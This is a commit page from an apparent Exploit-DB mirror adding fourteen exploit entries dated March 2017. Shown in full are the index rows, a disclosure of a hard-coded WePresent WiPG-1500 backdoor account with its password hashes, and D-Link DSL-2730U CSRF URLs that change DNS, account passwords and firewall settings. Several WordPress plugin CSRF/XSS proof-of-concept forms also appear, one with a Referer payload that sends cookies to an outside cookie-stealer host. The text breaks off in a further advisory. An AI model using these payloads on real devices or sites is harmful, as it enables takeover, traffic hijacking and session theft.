bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-03-02

Browse source 
14 new exploits

SysGauge 1.5.18 - Buffer Overflow
WePresent WiPG-1500 - Backdoor Account

Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)
DLink DSL-2730U Wireless N 150 - Cross-Site Request Forgery
Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting
WordPress Plugin Contact Form Manager - Cross-Site Request Forgery / Cross-Site Scripting
WordPress Plugin User Login Log 2.2.1 - Cross-Site Scripting
WordPress Plugin Popup by Supsystic 1.7.6 - Cross-Site Request Forgery
WordPress Plugin NewStatPress 1.2.4 - Cross-Site Scripting
WordPress Plugin Global Content Blocks 2.1.5 - Cross-Site Request Forgery
WordPress Plugin File Manager 3.0.1 - Cross-Site Request Forgery
SchoolDir - SQL Injection
Rage Faces Script 1.3 - SQL Injection
Meme Maker Script 2.1 - 'user' Parameter SQL Injection
This commit is contained in:
Offensive Security 2017-03-02 05:01:19 +00:00
parent 7fa7a111c4
commit 846ce42eca
15 changed files with 1275 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
files.csv
View file

@ -15304,6 +15304,8 @@ id,file,description,date,author,platform,type,port
41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
41443,platforms/macos/remote/41443.html,"macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0
41479,platforms/windows/remote/41479.py,"SysGauge 1.5.18 - Buffer Overflow",2017-02-28,"Peter Baris",windows,remote,0
41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15924,6 +15926,7 @@ id,file,description,date,author,platform,type,port
41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -37392,3 +37395,14 @@ id,file,description,date,author,platform,type,port
41466,platforms/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",java,webapps,0
41470,platforms/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps,0
41472,platforms/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,hardware,webapps,0
41478,platforms/hardware/webapps/41478.txt,"DLink DSL-2730U Wireless N 150 - Cross-Site Request Forgery",2017-03-01,"B GOVIND",hardware,webapps,0
41482,platforms/xml/webapps/41482.txt,"Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting",2017-03-01,"SEC Consult",xml,webapps,0
41483,platforms/php/webapps/41483.html,"WordPress Plugin Contact Form Manager - Cross-Site Request Forgery / Cross-Site Scripting",2017-03-01,"Edwin Molenaar",php,webapps,80
41484,platforms/php/webapps/41484.txt,"WordPress Plugin User Login Log 2.2.1 - Cross-Site Scripting",2017-03-01,"Axel Koolhaas",php,webapps,80
41485,platforms/php/webapps/41485.html,"WordPress Plugin Popup by Supsystic 1.7.6 - Cross-Site Request Forgery",2017-03-01,"Radjnies Bhansingh",php,webapps,80
41486,platforms/php/webapps/41486.txt,"WordPress Plugin NewStatPress 1.2.4 - Cross-Site Scripting",2017-03-01,"Han Sahin",php,webapps,80
41487,platforms/php/webapps/41487.html,"WordPress Plugin Global Content Blocks 2.1.5 - Cross-Site Request Forgery",2017-03-01,"Yorick Koster",php,webapps,80
41488,platforms/php/webapps/41488.html,"WordPress Plugin File Manager 3.0.1 - Cross-Site Request Forgery",2017-03-01,"David Vaartjes",php,webapps,80
41489,platforms/php/webapps/41489.txt,"SchoolDir - SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0
41490,platforms/php/webapps/41490.txt,"Rage Faces Script 1.3 - SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0
41491,platforms/php/webapps/41491.txt,"Meme Maker Script 2.1 - 'user' Parameter SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

23
platforms/hardware/remote/41480.txt Executable file
View file

@ -0,0 +1,23 @@
# Exploit Title: CVE-2017-6351 - WePresent undocumented privileged manufacturer backdoor account
# Date: 27/02/2017
# Exploit Author: Quentin Olagne
# Vendor Homepage: http://www.wepresentwifi.com/ or http://www.awindinc.com/products_wepresent_wipg_1500.html
# Software Link: http://www.awindinc.com/products_wepresent_wipg_1500.html
# Version: All versions of WiPG-1500 devices up to the latest firmware (1.0.3.7)
# Tested on: Latest firmware (1.0.3.7) of WiPG-1500 device
# CVE : CVE-2017-6351
WiPG-1500 device embeds a firmware with a manufacturer account with hard coded username / password.
Once the device is set in DEBUG mode, an attacker can connect to the device using telnet protocol and log in the device with the 'abarco' hard-coded manufacturer account.
This account is not documented, neither the DEBUG feature nor the use of telnetd on a port TCP/5885 (when debug mode is ON).
Here's the extract of the linux 'passwd' file:
root:x:0:0:root:/home:/bin/sh
abarco:x:1000:0:Awind-Barco User,,,:/home:/bin/sh
and the 'shadow':
root:$1$x1mFoD3w$uuvn.Z0p.XagX29uN3/Oa.:0:0:99999:7:::
abarco:$1$JB0Pn5dA$sROUF.bZVoQSjVrV06fIx1:0:0:99999:7:::
This vulnerability has been reported to the vendor but this product (WiPG-1500) is no longer maintained. This means it's a #WONTFIX vulnerability. Vendor has removed the 'abarco' account on the newest models but don't worry, DEBUG mode is still there with telnetd and you can also use the r00t account with a home and /bin/sh on the other systems in any case.

120
platforms/hardware/webapps/41478.txt Executable file
View file

@ -0,0 +1,120 @@
Author : B GOVIND
Exploit Title : DLink DSL-2730U Wireless N 150, Change DNS Configuration bypassing admin privilege
Date : 01-03-2017
Vendor Homepage : http://www.dlink.co.in
Firmware Link : ftp://support.dlink.co.in/firmware/DSL-2730U
Affected version : Hardware ver C1, Firmware ver: IN_1.0.0
Email id : govindnair7102@gmail.com
CVE : CVE-2017-6411
Change DNS Configuration Bypassing admin Privilege
-------------------------------------------------------
D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts admin, support and user. As per D-Link only “admin" account has unrestricted access to change configuration of device. Account name user can just view configuration settings and statistics.
1. Description of Vulnerability
Cross Site Request Forgery can be used to manipulate dnscfg.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can change primary and secondary DNS IP address to some malicious IP address without using admin account.
2. Proof of Concept
Use following URL to modify the DNS entries:
http://user:user@192.168.1.1/dnscfg.cgi?dnsPrimary=x.x.x.x&dnsSecondary=y.y.y.y&dnsIfcsList=&dnsRefresh=1
Here x.x.x.x and y.y.y.y are the malicious IP address attacker can use.
3. Impact of vulnerability
Information Disclosure: An attacker exploiting this vulnerability can obtain confidential information like users browsing profile. Modifying device DNS settings allows cybercriminals to perform malicious activities like the following:
(a) Redirect user traffic to malicious/fake sites. These sites can be phishing pages that spoofs well-known sites and tricks users into submit sensitive user credentials like banks account username and password.
(b) This can ensure that no more patches are updated from OS vendor sites or firewall sites.
(c) Replace ads on legitimate sites and serve users with unwanted/fake ads.
(d) Pushing malwares.
4. Solution
As per D-Link India this is the only no updated firmware is available for this hardware version which can mitigate this vulnerability which avoids privilege escalation.
All users of this hardware should change default passwords of not just admin account but also user and support
Change All Account Password Bypassing admin Privilege
----------------------------------------------------------
D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts admin, support and user. As per D-Link only “admin" account has unrestricted access to change configuration of device. Account name user can just view configuration settings and statistics. Default password of admin, support and user account are admin, support and user respectively.
1. Description of Vulnerability
Cross Site Request Forgery can be used to manipulate password.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can change password of all the three accounts without using admin account.
2. Proof of Concept
This exploit works only when accounts are using default password.
Use following URL to change admin account password from admin to
admin1.
http://user:user@192.168.1.1/password.cgi?
inUserName=admin&inPassword=ZGFyZWFkbWluMQ==&inOrgPassword=ZGFyZWFkbWlu
(b) Use following URL to change support account password from support to
support1.
http://user:user@192.168.1.1/password.cgi?
inUserName=support&inPassword=ZGFyZXN1cHBvcnQx&inOrgPassword=ZGFyZXN1cHBvcnQ=
(c) Use following URL to change user account password from user to
user1.
http://user:user@192.168.1.1/password.cgi?
inUserName=user&inPassword=ZGFyZXVzZXIx&inOrgPassword=ZGFyZXVzZXI=
Here inPassword is the new password and inOrgPassword is the existing password. Both these password strings are base64 encoded for confidentiality as connection between browser and web server is using http.
3. Impact of vulnerability
Elevation of privilege, Information Disclosure, Denial Of service
(a) Insider/Attacker can change the passwords of all the existing accounts and control the device as required. This will result in attacker having complete control over the device. He can capture traffic of other user and analyse traffic. Attacker can deny services as per his/her choice.
4. Solution
As per D-Link India this is the only no updated firmware available for this hardware version which can mitigate this vulnerability. All users of this hardware should change default passwords of all the default accounts.
Enable/Disable LAN side Firewall without admin privilege
---------------------------------------------------------
D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts admin, support and user. As per D-Link only “admin" account has unrestricted access to change configuration of device. Account name user can just view configuration settings and statistics. Default password of admin, support and user account are admin, support and user respectively.
1. Description of Vulnerability
Cross Site Request Forgery can be used to manipulate lancfg2.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can enable/disable LAN side firewall without admin privilege using user account.
2. Proof of Concept
Use following URL to enable LAN side firewall
http://user:user@192.168.1.1/lancfg2.cgi?ethIpAddress=192.168.1.1&eth SubnetMask=255.255.255.0&enblLanFirewall=1&enblIgmpSnp=0&enblIgmpMode=0&dhcpEthStart=192.168.1.2&dhcpEthEnd=192.168.1.254&dhcpLeasedTime=86400&enblDhcpSrv=1&enblLan2=0&enblLanDns=0
Use following URL to disable LAN side firewall
http://user:user@192.168.1.1/lancfg2.cgi?ethIpAddress=192.168.1.1&ethSubnetMask=255.255.255.0&enblLanFirewall=0&enblIgmpSnp=0&enblIgmpMode=0&dhcpEthStart=192.168.1.2&dhcpEthEnd=192.168.1.254&dhcpLeasedTime=86400&enblDhcpSrv=1&enblLan2=0&enblLanDns=0
3. Impact of vulnerability
By disabling LAN side firewall and by enabling Port Triggering, an attacker can ensure a backdoor access within LAN side as well as from WAN side.
Attacker can run port scanning tools to map services which otherwise wont be possible with firewall enabled.
4. Solution
As per D-Link India this is the only no updated firmware available for this hardware version which can mitigate this vulnerability. All users of this hardware should change default passwords of all the default accounts.

53
platforms/php/webapps/41483.html Executable file
View file

@ -0,0 +1,53 @@
<!--
Source: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery___cross_site_scripting_in_contact_form_manager_wordpress_plugin.html
Abstract
It was discovered that Contact Form Manager does not protect against Cross-Site Request Forgery. This allows an attacker to change arbitrary Contact Form Manager settings. In addtion, the plugin also fails to apply proper output encoding, rendering it vulnerable to stored Cross-Site Scripting.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160718-0003
Tested versions
These issues were successfully tested on Contact Form Manager WordPress Plugin version
Fix
There is currently no fix available.
Introduction
The Contact Form Manager WordPress Plugin lets users create and manage multiple customized contact forms for their website. It supports a wide range of contact form elements such as text field, email field, textarea, dropdown list, radio button, checkbox, date picker, captcha, and file uploader. It was discovered that Contact Form Manager does not protect against Cross-Site Request Forgery. This allows an attacker to change arbitrary Contact Form Manager settings. In addtion, the plugin also fails to apply proper output encoding, rendering it vulnerable to stored Cross-Site Scripting.
Details
These issues exists, because the plugin lacks an anti-CSRF token. Also improper filtering/output encoding is done on $_POST parameters. These issues are present in the filed contact-form-manager/admin/add_smtp.php and contact-form-manager/admin/form-edit.php.
The username input field on the XYZ Contact > SMTP Settings is vulnerable for Cross-Site Scripting, as wel as the Contact Form Name input field on the XYZ Contact > Contact Form page.
SMTP Settings URL:
http://<target>/wp-admin/admin.php?page=contact-form-manager-manage-smtp
Contact Forms URL:
http://<target>/wp-admin/admin.php?page=contact-form-manager-managecontactformsp
Proof of concept:
-->
<html>
<body>
<form id="f1" method="POST" action="http://<target>/wp-admin/admin.php?page=contact-form-manager-manage-smtp&action=add-smtp">
<table>
<tr><td>xyz_cfm_SmtpAuthentication<td><input name="xyz_cfm_SmtpAuthentication" value="true" size="100"></tr>
<tr><td>xyz_cfm_SmtpEmailAddress<td><input name="xyz_cfm_SmtpEmailAddress" value="<svg onload=alert(document.domain)>" size="100"></tr>
<tr><td>xyz_cfm_SmtpHostName<td><input name="xyz_cfm_SmtpHostName" value="<svg onload=alert(document.domain)>" size="100"></tr>
<tr><td>xyz_cfm_SmtpPassword<td><input name="xyz_cfm_SmtpPassword" value="<svg onload=alert(document.domain)>" size="100"></tr>
<tr><td>xyz_cfm_SmtpPortNumber<td><input name="xyz_cfm_SmtpPortNumber" value="25" size="100"></tr>
<tr><td>xyz_cfm_SmtpSecuirity<td><input name="xyz_cfm_SmtpSecuirity" value="notls" size="100"></tr>
</table>
</form>
<button onclick="document.getElementById('f1').submit()">Submit</button>
</body>
</html>

53
platforms/php/webapps/41484.txt Executable file
View file

File diff suppressed because one or more lines are too long

151
platforms/php/webapps/41485.html Executable file
View file

@ -0,0 +1,151 @@
<!--
Source: https://sumofpwn.nl/advisory/2016/popup_by_supsystic_wordpress_plugin_vulnerable_to_cross_site_request_forgery.html
Abstract
A Cross-site Request Forgery vulnerablity exists in the Popup by Supsystic WordPress Plugin. This vulnerablity allows attackers to add and modify scripting code that will target authenticated WordPress admins or visitors that see the popup generated by this plugin. Before exploitation of this issue succeeds, and scripting code is therefore injected, a victim WordPress admin to click a specially crafted link or visit a malicious attacker-controlled webpage.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160724-0013
Tested versions
This issue was succesfully tested on the Popup by Supsystic WordPress plugin version 1.7.6.
Fix
There is currently no fix available.
Introduction
The aim of the Popup by Supsystic WordPress plugin is to help you get more newsletter subscribers, promote new products, deliver special offers and to get more social followers.
A Cross-site Request Forgery vulnerablity exists in the Popup by Supsystic WordPress Plugin. This vulnerablity allows attackers to add and modify scripting code that will target authenticated admins or visitors that see the popup generated by this plugin. In order to exploit this issue the target user must click a specially crafted link or visit a malicious website (or advertisement).
Details
This issue exists because Popup by Supsystic lacks protection against Cross-Site Request Forgery attacks. The following proof of concept code demonstrates this issue:
-->
<html>
<body>
<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="params[main][show_on]" value="page_load" />
<input type="hidden" name="params[main][show_on_page_load_delay]" value="" />
<input type="hidden" name="ppsCopyTextCode" value="[supsystic-show-popup id=100]" />
<input type="hidden" name="ppsCopyTextCode" value="onclick="ppsShowPopup(100); return false;"" />
<input type="hidden" name="ppsCopyTextCode" value="#ppsShowPopUp_100" />
<input type="hidden" name="params[main][show_on_click_on_el_delay]" value="0" />
<input type="hidden" name="params[main][show_on_scroll_window_delay]" value="0" />
<input type="hidden" name="params[main][show_on_scroll_window_perc_scroll]" value="0" />
<input type="hidden" name="ppsCopyTextCode" value="#ppsShowPopUp_100" />
<input type="hidden" name="params[main][show_on_link_follow_delay]" value="0" />
<input type="hidden" name="ppsCopyTextCode" value="[supsystic-popup-content id=100]" />
<input type="hidden" name="params[main][close_on]" value="user_close" />
<input type="hidden" name="params[main][show_pages]" value="all" />
<input type="hidden" name="params[main][show_time_from]" value="12:00am" />
<input type="hidden" name="params[main][show_time_to]" value="12:00am" />
<input type="hidden" name="params[main][show_date_from]" value="" />
<input type="hidden" name="params[main][show_date_to]" value="" />
<input type="hidden" name="params[main][show_to]" value="everyone" />
<input type="hidden" name="params[main][show_to_first_time_visit_days]" value="30" />
<input type="hidden" name="params[main][show_to_until_make_action_days]" value="30" />
<input type="hidden" name="params[main][count_times_num]" value="1" />
<input type="hidden" name="params[main][count_times_mes]" value="day" />
<input type="hidden" name="params[main][hide_for_devices_show]" value="0" />
<input type="hidden" name="params[main][hide_for_post_types_show]" value="0" />
<input type="hidden" name="params[main][hide_for_ips_show]" value="0" />
<input type="hidden" name="params[main][hide_for_ips]" value="" />
<input type="hidden" name="params[main][hide_for_countries_show]" value="0" />
<input type="hidden" name="params[main][hide_for_languages_show]" value="0" />
<input type="hidden" name="params[main][hide_search_engines_show]" value="0" />
<input type="hidden" name="params[main][hide_preg_url_show]" value="0" />
<input type="hidden" name="params[main][hide_preg_url]" value="" />
<input type="hidden" name="params[main][hide_for_user_roles_show]" value="0" />
<input type="hidden" name="params[tpl][width]" value="400" />
<input type="hidden" name="params[tpl][width_measure]" value="px" />
<input type="hidden" name="params[tpl][bg_overlay_opacity]" value="0.5" />
<input type="hidden" name="params[tpl][bg_type_0]" value="color" />
<input type="hidden" name="params[tpl][bg_img_0]" value="" />
<input type="hidden" name="params[tpl][bg_color_0]" value="#8c7764" />
<input type="hidden" name="params[tpl][bg_type_1]" value="color" />
<input type="hidden" name="params[tpl][bg_img_1]" value="" />
<input type="hidden" name="params[tpl][bg_color_1]" value="#75362c" />
<input type="hidden" name="params[tpl][font_label]" value="default" />
<input type="hidden" name="params[tpl][label_font_color]" value="#ffffff" />
<input type="hidden" name="params[tpl][font_txt_0]" value="default" />
<input type="hidden" name="params[tpl][text_font_color_0]" value="#f9e6ce" />
<input type="hidden" name="params[tpl][font_footer]" value="default" />
<input type="hidden" name="params[tpl][footer_font_color]" value="#585858" />
<input type="hidden" name="params[tpl][responsive_mode]" value="def" />
<input type="hidden" name="params[tpl][reidrect_on_close]" value="" />
<input type="hidden" name="params[tpl][close_btn]" value="while_close" />
<input type="hidden" name="params[tpl][bullets]" value="lists_green" />
<input type="hidden" name="layered_style_promo" value="1" />
<input type="hidden" name="params[tpl][layered_pos]" value="" />
<input type="hidden" name="params[tpl][enb_label]" value="1" />
<input type="hidden" name="params[tpl][label]" value="SIGN UP<br> to our Newsletter!" />
<input type="hidden" name="params[tpl][enb_txt_0]" value="1" />
<input type="hidden" name="params_tpl_txt_0" value="<p>Popup by Supsystic lets you easily create elegant overlapping windows with unlimited features. Pop-ups with Slider, Lightbox, Contact and Subscription forms and more</p>" />
<input type="hidden" name="params[tpl][foot_note]" value="We respect your privacy. Your information will not be shared with any third party and you can unsubscribe at any time " />
<input type="hidden" name="params[tpl][enb_sm_facebook]" value="1" />
<input type="hidden" name="params[tpl][enb_sm_googleplus]" value="1" />
<input type="hidden" name="params[tpl][enb_sm_twitter]" value="1" />
<input type="hidden" name="params[tpl][sm_design]" value="boxy" />
<input type="hidden" name="params[tpl][anim_key]" value="none" />
<input type="hidden" name="params[tpl][anim_duration]" value="" />
<input type="hidden" name="params[tpl][enb_subscribe]" value="1" />
<input type="hidden" name="params[tpl][sub_dest]" value="wordpress" />
<input type="hidden" name="params[tpl][sub_wp_create_user_role]" value="subscriber" />
<input type="hidden" name="params[tpl][sub_aweber_listname]" value="" />
<input type="hidden" name="params[tpl][sub_aweber_adtracking]" value="" />
<input type="hidden" name="params[tpl][sub_mailchimp_api_key]" value="" />
<input type="hidden" name="params[tpl][sub_mailchimp_groups_full]" value="" />
<input type="hidden" name="test_email" value="canzihazcandy@gmail.com" />
<input type="hidden" name="params[tpl][sub_fields][name][enb]" value="1" />
<input type="hidden" name="params[tpl][sub_fields][name][name]" value="name" />
<input type="hidden" name="params[tpl][sub_fields][name][html]" value="text" />
<input type="hidden" name="params[tpl][sub_fields][name][label]" value="Name" />
<input type="hidden" name="params[tpl][sub_fields][name][value]" value="" />
<input type="hidden" name="params[tpl][sub_fields][name][custom]" value="0" />
<input type="hidden" name="params[tpl][sub_fields][name][mandatory]" value="0" />
<input type="hidden" name="params[tpl][sub_fields][email][name]" value="email" />
<input type="hidden" name="params[tpl][sub_fields][email][html]" value="text" />
<input type="hidden" name="params[tpl][sub_fields][email][label]" value="E-Mail" />
<input type="hidden" name="params[tpl][sub_fields][email][value]" value="" />
<input type="hidden" name="params[tpl][sub_fields][email][custom]" value="0" />
<input type="hidden" name="params[tpl][sub_fields][email][mandatory]" value="1" />
<input type="hidden" name="params[tpl][sub_fields][email][enb]" value="1" />
<input type="hidden" name="params[tpl][sub_txt_confirm_sent]" value="Confirmation link was sent to your email address. Check your email!" />
<input type="hidden" name="params[tpl][sub_txt_success]" value="Thank you for subscribe!" />
<input type="hidden" name="params[tpl][sub_txt_invalid_email]" value="Empty or invalid email" />
<input type="hidden" name="params[tpl][sub_txt_exists_email]" value="Empty or invalid email" />
<input type="hidden" name="params[tpl][sub_redirect_url]" value="" />
<input type="hidden" name="params[tpl][sub_txt_confirm_mail_subject]" value="Confirm subscription on [sitename]" />
<input type="hidden" name="params[tpl][sub_txt_confirm_mail_from]" value="admin@mail.com" />
<input type="hidden" name="params[tpl][sub_txt_confirm_mail_message]" value="You subscribed on site <a href="[siteurl]">[sitename]</a>. Follow <a href="[confirm_link]">this link</a> to complete your subscription. If you did not subscribe here - just ignore this message." />
<input type="hidden" name="params[tpl][sub_txt_subscriber_mail_subject]" value="[sitename] Your username and password" />
<input type="hidden" name="params[tpl][sub_txt_subscriber_mail_from]" value="admin@mail.com" />
<input type="hidden" name="params[tpl][sub_txt_subscriber_mail_message]" value="Username: [user_login]<br />Password: [password]<br />[login_url]" />
<input type="hidden" name="params[tpl][sub_redirect_email_exists]" value="" />
<input type="hidden" name="params[tpl][sub_btn_label]" value="SIGN UP" />
<input type="hidden" name="params[tpl][sub_new_email]" value="admin&@mail.com" />
<input type="hidden" name="params[tpl][sub_new_subject]" value="New Subscriber on Summer of Pwnage" />
<input type="hidden" name="params[tpl][sub_new_message]" value="You have new subscriber on your site <a href="[siteurl]">[sitename]</a>, here us subscriber information:<br />[subscriber_data]" />
<input type="hidden" name="stat_from_txt" value="" />
<input type="hidden" name="stat_to_txt" value="" />
<input type="hidden" name="css" value="" />
<input type="hidden" name="html" value="<link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Amatic+SC" />&#10; <script>alert("xss")</script>&#10;<div id="ppsPopupShell_[ID]" class="ppsPopupShell ppsPopupListsShell">&#10; <a href="#" class="ppsPopupClose ppsPopupClose_[close_btn]"></a>&#10;&#10; <div class="ppsInnerTblContent">&#10; <div class="ppsPopupListsInner ppsPopupInner">&#10; [if enb_label]&#10; <div class="ppsPopupLabel ppsPopupListsLabel">[label]</div>&#10; [endif]&#10; <div style="clear: both;"></div>&#10; [if enb_txt_0]&#10; <div class="ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0">&#10; [txt_0]&#10; </div>&#10; [endif]&#10; [if enb_subscribe]&#10; <div class="ppsSubscribeShell">&#10; [sub_form_start]&#10; [sub_fields_html]&#10; <input type="submit" name="submit" value="[sub_btn_label]" />&#10; [sub_form_end]&#10; <div style="clear: both;"></div>&#10; </div>&#10; [endif]&#10; <div style="clear: both;"></div>&#10; <div class="ppsRightCol">&#10; [if enb_sm]&#10; <div style="clear: both;"></div>&#10; <div class="ppsSm">&#10; [sm_html]&#10; </div>&#10; [endif]&#10; [if enb_foot_note]&#10; <div class="ppsFootNote">&#10; [foot_note]&#10; </div>&#10; [endif]&#10; </div>&#10; </div>&#10; </div>&#10;</div>&#10;" />
<input type="hidden" name="params[opts_attrs][bg_number]" value="2" />
<input type="hidden" name="params[opts_attrs][txt_block_number]" value="1" />
<input type="hidden" name="mod" value="popup" />
<input type="hidden" name="action" value="save" />
<input type="hidden" name="id" value="100" />
<input type="hidden" name="params_tpl_txt_val_0" value="<p>Popup by Supsystic lets you easily create elegant overlapping windows with unlimited features. Pop-ups with Slider, Lightbox, Contact and Subscription forms and more</p>" />
<input type="hidden" name="pl" value="pps" />
<input type="hidden" name="reqType" value="ajax" />
<input type="submit"/>
</form>
</body>
</html>

48
platforms/php/webapps/41486.txt Executable file
View file

@ -0,0 +1,48 @@
Source: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_the_wordpress_newstatpress_plugin.html
Abstract
A persistent Cross-Site Scripting (XSS) vulnerability has been found in the WordPress NewStatPress plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160712-0030
Tested versions
This issue was successfully tested on WordPress NewStatPress plugin version 1.2.4.
Fix
This issue has been addressed in NewStatPress version 1.2.5. This version can be download from the NewStatPress GitHub account: https://github.com/lechab/newstatpress#125
Introduction
The WordPress NewStatPress plugin is a real-time plugin to manage the visits' statistics on a WordPress site. It doesn't require external web analytics. A persistent Cross-Site Scripting vulnerability has been discovered in the WordPress NewStatPress plugin which allows an unauthenticated attacker to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes or deliver malware.
Details
The WordPress NewStatPress plugin fails to sufficiently check input supplied to a GET request for a resource on a WordPress site with a vulnerable version of the NewStatPress plugin. In addition input supplied to the Referer header is insufficiently sanitized. As a result a malicious request will be stored on the Last Visitors and Visitors tab of the Visits page, executing the payload when an unsuspecting user views one of the mentioned tabs on this page.
Persistent Cross-Site Scripting vulnerabilities are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, in this case potentially a WP admin reviewing the stats.
Proof of concept
This vulnerability can be demonstrated by submitting the following request:
GET /sumofpwn/"><script>alert(document.cookie);</script> HTTP/1.1
Host: 192.168.28.129
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla Chrome/51.0.2704.103 Safari/537.36
Referer: javascript:document.location=`http://www.XXXXXXyourhackerdomainXXXXXX.nl/demo/xss/cookiestealer.php?c=`+encodeURIComponent(document.cookie);
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,nl;q=0.6
Connection: close
Based on the above request, the vulnerable output will be:
1) <a href="/?/sumofpwn/\"><script>alert(document.cookie);</script>" target="_blank">/sumofpwn/\"><script>alert(document.cookie);</script></a>
2) Arrived from <a href="javascript:document.location=`http://www.sfylabs.nl/demo/xss/cookiestealer.php?c=`+encodeURIComponent(document.cookie);" target="_blank">javascript:document.location=`http://www.sfylabs.nl/demo/xss/cookiestealer.php?c=`+encodeURIComponent(document.cookie);</a>
http://yourhost/wp-admin/admin.php?page=nsp_main
http://yourhost/wp-admin/admin.php?page=nsp_visits

46
platforms/php/webapps/41487.html Executable file
View file

@ -0,0 +1,46 @@
<!--
Source: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_global_content_blocks_wordpress_plugin.html
Abstract
It was discovered that the Global Content Blocks WordPress Plugin is vulnerable to Cross-Site Request Forgery. Amongst others, this issue can be used to update a content block to overwrite it with arbitrary PHP code. Visiting a page or blog post that uses this content block will cause the attacker's PHP code to be executed.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160712-0031
Tested versions
This issue was successfully tested on Global Content Blocks WordPress Plugin version 2.1.5.
Fix
There is currently no fix available.
Introduction
